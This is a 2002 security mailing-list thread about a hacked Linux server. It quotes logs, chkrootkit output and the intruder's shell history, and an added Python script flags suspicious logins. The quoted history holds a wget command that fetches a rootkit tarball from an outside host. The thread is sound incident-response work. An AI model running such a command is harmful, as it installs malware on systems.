From: Ver Allan Sumabat (ver_allan@yahoo.com)
Date: Wed Sep 11 2002 - 22:15:42 CDT


    We used Linux 2.4.7-10. We only opened ports 21 (ftp),
    22 (ssh), and 443 (https).

    21 - wu-ftpd-2.6.1-20
    22 - openssh-3.1
    443 - tomcat-3.2.4

    1. This is the content of /home/war's .bash_history:

    wget
    wget http://mrunix.free.fr/roy/w00tkit.tgz
    logout

    2. He was trying to send a mail to himself regarding
    the system's resources:

    The original message was received at Thu, 5 Sep 2002 22:21:37 +0800
    from root@localhost

       ----- The following addresses had permanent fatal errors -----
    roi_blabla@walla.co.il
        (reason: 501 5.1.8 Sender domain must exist)

       ----- Transcript of session follows -----
    ... while talking to rmail.walla.co.il.:
    >>> MAIL From:<root@srv1.iconnect.com.ph> SIZE=2283
    <<< 501 5.1.8 Sender domain must exist
    501 5.6.0 Data format error

    3. walla.co.il is in Israel.

    4. Tracing 212.179.207.211 gives Israel also.

    I have moved the files to another machine and
    reinstalled the server because we need to put it up and
    running ASAP. Do you think the exploit was done through
    ftp? Can you help me replicate it? I was looking for
    procedures or scripts in ssh/ftp exploits so that I
    can try to attack our server but I cannot find any.

    --- Loki <loki@fatelabs.com> wrote:
    > What version of SSHD were you running, check commonly exploited
    > services.
    >
    > 1. SSHD (crc32)
    > 2. FTPD
    > 3. Apache (chunking)
    >
    > Get back to us with the versions you were running of SSH, FTP, and
    > Apache and we can help you out. How hardened was the OS? Did you turn
    > off all RPC services, etc. We need more info.
    >
    > Eric/Loki
    > Internet Warfare and Intelligence
    > Fate Research Labs
    > www.fatelabs.com
    >
    > -----Original Message-----
    > From: Ver Allan Sumabat [mailto:ver_allan@yahoo.com]
    >
    > Sent: Tuesday, September 10, 2002 6:08 AM
    > To: incidents@securityfocus.com
    > Subject: possible ssh hack
    >
    >
    > Hi,
    >
    > We have just recently been hacked. I have no idea how he came in.
    > Here are my preliminary investigations:
    >
    > 1. He was able to add a user without logging in.
    >
    > **Unmatched Entries**
    > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
    > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
    > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
    > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
    > Sep 5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
    > Sep 5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
    > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
    > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
    > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
    >
    >
    > 2. He installed a tarball w00tkit.tgz in /home/war
    >
    > 3. After running chkrootkit, the significant lines are:
    >
    > ...
    > Checking `ifconfig'... INFECTED
    > ...
    > Searching for Showtee... Warning: Possible Showtee
    > Rootkit installed
    > ...
    > Checking `lkm'... You have 1 process hidden for ps command
    > Warning: Possible LKM Trojan installed
    >
    > 4. ssh won't run anymore
    >
    > Can anyone help me on how the intrusion was done?
    >
    > Thanks.
    >
    > Regards,
    >
    > Allan
    >
    >
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service. For
    > more information on this free incident handling, management
    > and tracking system please see:
    > http://aris.securityfocus.com
    >


    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
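The sshd and useradd lines quoted in this thread contain exactly the sequence a defender would want to alert on: password logins accepted for root, a useradd followed within seconds by an ssh login for the new account from an address outside the site, and an sshd restart nobody scheduled. The Python below is an added example written for this page, not code from the thread or from any of the projects named in it. The sample log is transcribed from the quoted excerpt and reflowed one event per line; the year 2002 is supplied from the thread's own dates because syslog lines carry none, and the one-hour correlation window is an assumption.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed test input: the sshd/useradd excerpt quoted in this thread,
# one event per line.
SAMPLE_LOG = """\
Sep  5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
Sep  5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
Sep  5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
Sep  5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
Sep  5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
Sep  5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
Sep  5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
Sep  5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
Sep  5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
"""

SYSLOG_YEAR = 2002  # assumption: syslog has no year field; taken from the thread's dates

LINE_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[\w-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
ACCEPT_RE = re.compile(
    r"^Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)
USERADD_RE = re.compile(r"^new user: name=(?P<user>[^,]+), uid=(?P<uid>\d+)")


def parse_syslog(text, year=SYSLOG_YEAR):
    """Turn raw syslog lines into dicts carrying a real datetime; skip anything unparseable."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = datetime.strptime(
            f"{year} {m['mon']} {int(m['day']):02d} {m['time']}", "%Y %b %d %H:%M:%S"
        )
        events.append({"ts": stamp, "host": m["host"], "prog": m["prog"], "msg": m["msg"]})
    return events


def analyse(events, window=timedelta(hours=1)):
    """Apply three defender-side rules; return (rule, timestamp, detail) findings in log order."""
    findings = []
    created = {}  # username -> time the account was created, from useradd
    for ev in events:
        if ev["prog"] == "useradd":
            m = USERADD_RE.match(ev["msg"])
            if m:
                created[m["user"]] = ev["ts"]
        elif ev["prog"] == "sshd":
            m = ACCEPT_RE.match(ev["msg"])
            if m:
                user, ip, method = m["user"], m["ip"], m["method"]
                # Rule 1: interactive password logins as root should not occur at all.
                if user == "root" and method == "password":
                    findings.append(("root-password-login", ev["ts"], f"root from {ip}"))
                # Rule 2: an account created moments ago logging in from a public address.
                born = created.get(user)
                if born is not None and ev["ts"] - born <= window and ip_address(ip).is_global:
                    age = ev["ts"] - born
                    findings.append(("new-account-external-login", ev["ts"],
                                     f"{user} created {age} earlier, login from {ip}"))
            elif ev["msg"].startswith("Received SIGHUP"):
                # Rule 3: an sshd restart with no matching change record deserves a look.
                findings.append(("sshd-restart", ev["ts"], f"sshd restarted on {ev['host']}"))
    return findings


if __name__ == "__main__":
    for rule, ts, detail in analyse(parse_syslog(SAMPLE_LOG)):
        print(f"{ts:%b %d %H:%M:%S}  {rule:28s} {detail}")
```

Run against the sample, the analysis reports the two root password logins from 10.13.41.4, the login of the just-created "war" account from 212.179.207.211 thirty-two seconds after useradd, and the sshd restart at 22:21:48. The private-address test in rule 2 is what separates the internal root logins from the external one; whether those internal root logins were legitimate is a question for whoever owns 10.13.41.4, which is why rule 1 reports them regardless of source.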